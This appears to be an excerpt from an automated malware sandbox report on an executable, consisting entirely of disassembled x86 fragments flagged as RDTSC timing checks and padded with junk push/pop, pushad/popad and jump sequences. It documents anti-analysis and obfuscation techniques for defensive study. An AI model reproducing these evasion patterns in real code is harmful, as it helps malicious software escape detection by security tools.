                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD5795 second address: BD57B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD57B2 second address: BD57B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD57B8 second address: BD57BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD57BC second address: BD57CB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 ja 00007FEB1C7EA9D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD64E1 second address: BD64E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD6A52 second address: BD6A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEB1C7EA9E8h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD6A70 second address: BD6A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD6A76 second address: BD6A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEB1C7EA9DCh 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD6A87 second address: BD6ABB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEB1CC19F7Dh 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FEB1CC19F84h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jne 00007FEB1CC19F86h 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BD6ABB second address: BD6AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDC68D second address: BDC693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDC693 second address: BDC697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDB344 second address: BDB35E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEB1CC19F82h 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDB35E second address: BDB39C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEB1C7EA9E1h 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FEB1C7EA9E8h 0x00000011 jmp 00007FEB1C7EA9DEh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDB4F9 second address: BDB4FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDB8EF second address: BDB91D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 jmp 00007FEB1C7EA9E1h 0x0000000c jmp 00007FEB1C7EA9DEh 0x00000011 popad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDBBD9 second address: BDBBF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007FEB1CC19F7Eh 0x0000000c jno 00007FEB1CC19F76h 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push edi 0x00000017 pop edi 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDBBF3 second address: BDBC4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E7h 0x00000007 ja 00007FEB1C7EA9D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FEB1C7EA9E4h 0x00000017 jmp 00007FEB1C7EA9E9h 0x0000001c popad 0x0000001d popad 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 jnl 00007FEB1C7EA9D6h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDBEF3 second address: BDBEF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDBEF7 second address: BDBF04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDC024 second address: BDC036 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F7Ch 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDC036 second address: BDC03E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDC03E second address: BDC042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDC042 second address: BDC046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDC046 second address: BDC05A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FEB1CC19F82h 0x0000000c jl 00007FEB1CC19F76h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B891B1 second address: B891B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: B891B7 second address: B891CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEB1CC19F7Dh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDC4EB second address: BDC4FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FEB1C7EA9D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDC4FA second address: BDC4FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDC4FE second address: BDC50E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FEB1C7EA9D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDC50E second address: BDC514 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BDAE54 second address: BDAE64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FEB1C7EA9D6h 0x0000000a pop edx 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BE00D2 second address: BE00F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FEB1CC19F86h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BE00F9 second address: BE011F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jc 00007FEB1C7EA9D6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jg 00007FEB1C7EA9EDh 0x00000013 jmp 00007FEB1C7EA9E1h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA7530 second address: BA755B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FEB1CC19F78h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D2284h] 0x00000013 lea eax, dword ptr [ebp+124822C2h] 0x00000019 sub dword ptr [ebp+122D310Fh], esi 0x0000001f nop 0x00000020 push esi 0x00000021 push esi 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 pop esi 0x00000025 pop esi 0x00000026 push eax 0x00000027 pushad 0x00000028 push edi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA755B second address: BA757A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FEB1C7EA9E8h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA757A second address: B885AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FEB1CC19F78h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 call 00007FEB1CC19F86h 0x00000027 adc di, A3C1h 0x0000002c pop edi 0x0000002d call dword ptr [ebp+124484DEh] 0x00000033 jbe 00007FEB1CC19F90h 0x00000039 pushad 0x0000003a jmp 00007FEB1CC19F85h 0x0000003f push edi 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA7993 second address: 9F88B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FEB1C7EA9E4h 0x0000000f nop 0x00000010 jmp 00007FEB1C7EA9E0h 0x00000015 push dword ptr [ebp+122D1251h] 0x0000001b mov dx, 81BBh 0x0000001f call dword ptr [ebp+122D2844h] 0x00000025 pushad 0x00000026 stc 0x00000027 xor eax, eax 0x00000029 pushad 0x0000002a movzx edx, cx 0x0000002d mov ebx, 26BB5576h 0x00000032 popad 0x00000033 mov edx, dword ptr [esp+28h] 0x00000037 mov dword ptr [ebp+122D3035h], edi 0x0000003d mov dword ptr [ebp+122D36C8h], eax 0x00000043 stc 0x00000044 jmp 00007FEB1C7EA9DCh 0x00000049 mov esi, 0000003Ch 0x0000004e jmp 00007FEB1C7EA9E7h 0x00000053 add esi, dword ptr [esp+24h] 0x00000057 jmp 00007FEB1C7EA9DFh 0x0000005c lodsw 0x0000005e xor dword ptr [ebp+122D3035h], ebx 0x00000064 add eax, dword ptr [esp+24h] 0x00000068 jmp 00007FEB1C7EA9E2h 0x0000006d jmp 00007FEB1C7EA9E9h 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 or dword ptr [ebp+122D3035h], edi 0x0000007c push eax 0x0000007d jo 00007FEB1C7EA9E2h 0x00000083 jbe 00007FEB1C7EA9DCh 0x00000089 push eax 0x0000008a push edx 0x0000008b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA7EFF second address: BA7F11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1CC19F7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA8411 second address: BA841F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEB1C7EA9D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA841F second address: BA8423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA87D4 second address: BA87E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BA87E1 second address: BA87E7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BE03E5 second address: BE0400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEB1C7EA9DAh 0x00000009 popad 0x0000000a pop edx 0x0000000b pushad 0x0000000c jc 00007FEB1C7EA9DEh 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BE0C9D second address: BE0CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BE0CA3 second address: BE0CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BE0CA9 second address: BE0CAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BE0E13 second address: BE0E1F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BE67FC second address: BE6841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FEB1CC19F7Ch 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007FEB1CC19F7Fh 0x00000013 popad 0x00000014 jl 00007FEB1CC19F95h 0x0000001a jng 00007FEB1CC19F87h 0x00000020 jmp 00007FEB1CC19F81h 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BE638F second address: BE6394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BE6394 second address: BE63AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEB1CC19F86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BE9309 second address: BE930F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BEAF86 second address: BEAF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF25F0 second address: BF2608 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF2608 second address: BF2626 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEB1CC19F89h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF2A11 second address: BF2A19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF2A19 second address: BF2A4C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007FEB1CC19F7Fh 0x0000000c jmp 00007FEB1CC19F81h 0x00000011 pop edi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jg 00007FEB1CC19F76h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF6D66 second address: BF6D91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEB1C7EA9DDh 0x00000008 jo 00007FEB1C7EA9D6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007FEB1C7EA9D8h 0x00000019 pushad 0x0000001a popad 0x0000001b jp 00007FEB1C7EA9D8h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF6D91 second address: BF6D97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF6D97 second address: BF6DC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9DEh 0x00000007 jmp 00007FEB1C7EA9E5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF672C second address: BF6730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF6730 second address: BF6734 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF69CE second address: BF69DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FEB1CC19F7Ah 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF69DE second address: BF69E3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BF69E3 second address: BF69ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BFADD8 second address: BFADEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FEB1C7EA9DBh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BFA45B second address: BFA496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007FEB1CC19F7Eh 0x0000000a jg 00007FEB1CC19F82h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 jmp 00007FEB1CC19F80h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BFA64E second address: BFA66F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FEB1C7EA9DAh 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 jnp 00007FEB1C7EA9D6h 0x0000001e push esi 0x0000001f pop esi 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BFA66F second address: BFA679 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FEB1CC19F7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: BFA7AD second address: BFA7B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C01336 second address: C0133C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C0133C second address: C01342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C01342 second address: C0134C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FEB1CC19F76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C0134C second address: C01350 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C02089 second address: C0208D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C0208D second address: C02095 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C0265A second address: C0266F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FEB1CC19F7Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C0630E second address: C06316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C06316 second address: C06320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FEB1CC19F76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C06320 second address: C0632F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEB1C7EA9DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C064B2 second address: C064BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FEB1CC19F76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C064BE second address: C064DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FEB1C7EA9E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C064DB second address: C064F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FEB1CC19F87h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C067EC second address: C067F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeRDTSC instruction interceptor: First address: C0B9A9 second address: C0B9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
